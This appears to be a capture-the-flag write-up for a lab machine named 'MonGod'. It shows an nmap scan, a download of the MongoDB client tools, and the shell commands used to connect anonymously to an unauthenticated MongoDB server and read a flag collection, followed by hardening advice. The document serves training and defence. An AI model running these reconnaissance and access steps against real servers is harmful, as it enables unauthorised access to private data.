- Machine Name: MonGod
- IP Address: 10.129.60.233
- User: cywf
1. NMAP Scan: I started by running an NMAP scan to identify open ports and services running on the target machine.
$nmap -p- -T4 -sV 10.129.60.233
Results:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-09-10 04:10 BST
Nmap scan report for 10.129.60.233
Host is up (0.070s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
27017/tcp open mongodb MongoDB 3.6.8
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.42 seconds
2. MongoDB Exploration: After identifying that MongoDB was running on port 27017, I proceeded to connect to it.
First, I installed the MongoDB command-line tools:
curl -O https://fastdl.mongodb.org/linux/mongodb-linux-x86_64-3.4.7.tgz
tar xvf mongodb-linux-x86_64-3.4.7.tgz
Then, I connected to the MongoDB server:
./mongo mongodb://10.129.60.233:27017
Upon connection, I listed the databases and inspected the sensitive_information database:
> show dbs
> use sensitive_information;
> show collections;
> db.flag.find().pretty();
The MongoDB instance on the target machine was misconfigured, allowing anonymous connections without any authentication. This allowed me to access the databases and retrieve sensitive information.
- Enable Authentication: Ensure that MongoDB is running with authentication enabled. This can be done by setting the --auth flag when starting the MongoDB server.
- Bind to localhost: If the MongoDB instance is not intended to be accessed externally, bind it to localhost (127.0.0.1).
- Firewall Rules: Implement firewall rules to restrict access to the MongoDB port (27017 by default) only to trusted IP addresses.
- Regularly Update: Ensure that MongoDB is regularly updated to the latest version to benefit from security patches and improvements.
- Monitor Logs: Regularly monitor MongoDB logs for any suspicious activity or unauthorized access attempts.